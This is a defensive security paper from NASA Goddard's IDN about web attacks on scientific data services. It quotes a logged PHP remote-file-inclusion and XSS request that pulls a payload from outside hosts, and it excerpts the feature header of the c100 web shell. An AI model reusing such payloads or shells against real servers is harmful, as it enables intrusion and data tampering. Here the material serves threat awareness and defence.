Security: Best Practice Insights from the IDN Background The Goddard Space Flight Center was an early adopter of Internet based networking. Networks were initially set up in an open environment, with few restrictions or security measures in place. As time progressed, and network based attacks increased, additional security measures have been put into place. During the 1970s and 1980s, there was a “defaualt allow” policy, with only key ports being blocked or limited, telnet for example. Attackers were easily able to target systems and services on higher ports that were not restricted. During the late 1990s a “default deny” policy was implemented which greatly reduced the attack surface to key public services, such as ftp, http or email. The result of which was a great increase in the number of attacks on those ports. Within the IDN, we have seen two major trends: 1) an increase in the number of web services we offer, and 2) an increase in the number of web attacks that are occurring. The IDN may serve as an example for the greater WGISS community as a whole. The WGISS community faces a similar dilemma. We have a responsibility to serve our users and collaborate within the community, and the Web is currently the best mechanism to do this. In doing so, our overall security posture may be decreased. In order to combat this, we must, as a group, communicate the threats and solutions in our community, implement proactive security awareness, and incorporate security best practices. Importance The scientific community completely depends on the quality and accuracy of the data that they use. With the proliferation and interdependence of web services, the assurance that those services are accurate and secure becomes increasingly critical. The introduction of one security flaw into a web services based architecture could have a widespread, international impact. This is especially true of web service chaining architectures. General system security, especially in light of recent high profile email account hacks, is also of great importance. Evidence Within the IDN, malicious attacks and probes are a common occurrence. Some probes are “shots in the dark”, with attackers spreading a wide net, looking for common mistakes that are easily compromised. Other attacks appear more recognizance based, probing systems for open ports and possible entry porints. In the following real world exanple (fig 1), some of the attacks carry a devastating payload: Seen in server Logs: 83.217.66.xxx - - [03/Sep/xxxx:05:56:51 -0400] "GET http://xxx.gsfc.nasa.gov/some.cgi?rcpt=http://ydfgsdfg.txt?=<script>alert("xxx");</script> Hello Admin! Today%2 0You're Being Hacked By Sys!<script>alert("Hacked By Sys");</script><?php include ("http://xyz.altervista.org/private2.txt?"); ?><ahref="<?php require ($files_dir.'/_custom_menu_link.php'); ?>"><?php require($files_ dir.'/_custom_menu_name.php'); ?></<br><ahref="<?php require($files_dir.'/_custom_menu_name.php'); ?>prova</a><b>es_custom_menu.php?files_dir=http://xyz.altervista.org/private2.txt?<ahref="<?php require($files_dir.'http://paintweb.altervista.org/private2.txt?); ?>prova1</a><br><a href="<?php require($files_dir.'http://paintweb.altervista.org/private2.txt?); ?">hacked</a><br><a href=<?php require($files_dir.'http://xyz.web.altervista.org/private2.txt?); ?>ha2cked</a><br>< href=page?= >ha2c3ked</a><br><a href=asd?page= >ha2c3keed</a><br>asd?page=http://xxx.altervista.org/private2.txt? HTTP/1.1" 200 31477 "-" "Mozilla/5.0 (Windows; U; Windows N T 5.1; it; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" TCP_MISS:DIRECT Figure 1: Web Based Attack Detected This attack is attempting to take advantage of an improperly configured web server running the PHP web programming language. This attack attempts, in just one request, to cause the vulnerable web server download and execute a well crafted payload (fig. 2), with devastating capabilities: Payload at http://xyz.altervista.org/private2.txt: <?php /*********************************************************************** * Locus7s Modified c100 Shell * Beta v. 1.0a - Project x2300 * Written by #ophAcker team * Modified by error & Be_gO * Re-Modified by #error_maker (15.2.07) *======================================================== * New Modifications Implemented -* -Added link to Enumerate to escalate priviledges * -Added Rootshell.c * -Added Rootshell.c;auto-compiler * -Execute Rootshell.c * -Added Mig-Log Logcleaner * -Execute Mig-Log Logcleaner * -milw0rm searcher (Grabs OS and searches milw0rm) * -Locus7s Style & Image * -Added w4ck1ng Shell Backdoor Connect and Backdoor * -Added PHP-Proxy link to hide you * -Added your ip and server ip with whois capability * -Added private 0day released by allahaka which utilizes the linux * sudo bash to execute a stack overflow. (Continued) Figure 2: Attack Payload As can be seen in this example, the payload includes root shell compromises, log cleaners, php proxies to create back door access to the server, stack overflows, privilege escalation, amongst others. Any one of these capabilities could yield full control of the system over to the attacker, potentially without the owners of the system ever detecting the compromise. Within the WGISS community, it should be clear how such a compromise could lead to serious ramifications in the scientific world. Web server compromises could lead indirectly or directly to the compromise of data repositories and metadata systems. Should the integrity of those systems become questioned, so too could the science derived from using that data. The above example is just one of the many types of attacks that we face today. Solutions/Best Practices Obtaining a high level of security while maintaining robust levels of usability and interoperability is a time consuming perpetually changing and dynamic process. As systems and software change and new capabilities are added, new attack vectors arise. Some applications that serve our community are provided by Commercial Off the Shelf (COTS) vendors or Open Source Software (OSS) providers. For example, the Catalog Service for the Web (CSW) protocols are commonly implemented using COTS or OSS software. When choosing COTS or OSS software, there are several best practices that can be followed. Investigating the software security record of the software provider can be useful, as can inspecting the frequency of software releases and maintenance. Staying on top of software security patches is vital, and regular maintenance checks should be performed. Review your COTS/OSS software logs. Often failed attack attempts will be seen in the logs prior to a compromise. Additionally, software should be remotely and locally audited for security vulnerabilities, both with automated security applications, and by knowledgeable software developers and security professionals. In all cases the Principle of Least Privilege should be applied. This is true of the software modules that are deployed, and, where this is not practical, in limiting access to the application to only those that require it. Consider if the application needs to be opened to the entire world or if access should be implemented. There are a variety of mechanisms that can be used to limit access to your server. Authentication can be applied, specific Allow/Deny directives can be incorporated into the web server, Firewall rules can be established to only allow specific users from specific hosts, and rate limiting can be incorporated to limit the ability of the attacker to execute brute force attempts against your web serveer. Figure 3 shows and example of how to limit shell access attempts on a Linux server using the host based Linux firewall. In this example, access is limited to only 100 request in a 60 second period. -A WEB -m recent --set --name WEB -A WEB -m recent --update --seconds 60 --hitcount 100 --rttl --name WEB -j DROP -A WEB -j ACCEPT Figure 3: Rate Limiting with Linux IPTables Regular security audits should be performed as a part of general system security. There are a variety of tools that can be used to look for problems with the server. NMAP can be used for network and web service audits, it provides operating system detection capabilities, and web service version detection. NESSUS can be use for full security scans. It scans for all network vulnerabilities and commercial support is availale. Nikto is another tool that is good for looking for specific web vulnerabilities. It can detect over 3500 dangerous files or CGIs and is capable of flagging over 250 web server vulnerabilities. In addition to scanning the software for problems, it is critical understand the inner workings of the software and the capabilities it provides. For example, the OpenGIS Catalogue Services Speicifiation defines how the specification can be used to delete elements from a repository (fig. 4): OpenGIS® Catalogue Services Specification, Page 168 10.11.3.4 Delete action The following XML Schema fragment defines a delete action: <xsd:complexType name="DeleteType" id="DeleteType"> <xsd:sequence> <xsd:element ref="csw:Constraint" minOccurs="1" maxOccurs="1"/> </xsd:sequence> <xsd:attribute name="typeName" type="xsd:anyURI" use="optional"/> <xsd:attribute name="handle" type="xsd:ID" use="optional"/> </xsd:complexType> The <Delete> element contains a <csw:Constraint> element (see Subclause 10.3.7) that identifies a set of records that are to be deleted from the catalogue. The <csw:Constraint> element shall be specified in order to prevent every record in the catalogue from inadvertently being deleted. The typeName attribute is used to specify the collection name from which records will be deleted. The handle attribute is described in subclause 10.11.3.2. Figure 4: OpenGIS Catalogue Services Specification Some users of the COTS/OSS software that implements the specification may not be aware of the full capabilities of the software. Should this function be improperly deployed, it may be possible for external individuals to delete every record in their database. Fully understanding the software is paramount prior to deployment. Other security best practices include: 1. security in depth by including using multiple mechanisms for limiting access or authenticating, 2. understanding trust relationships with other projects and other agencies 3. focusing on data integrity 4. running good reliable and tested backups 5. preventing data misuse or misattribution 6. employing a knowledgeable, dependable staff As always, common sense is often the best practice. While security may seem like an unnecessary burden, one must always measure the consequences. In the case of scientific data and metadata integrity, those consequences may be far more extensive than they appear on the surface.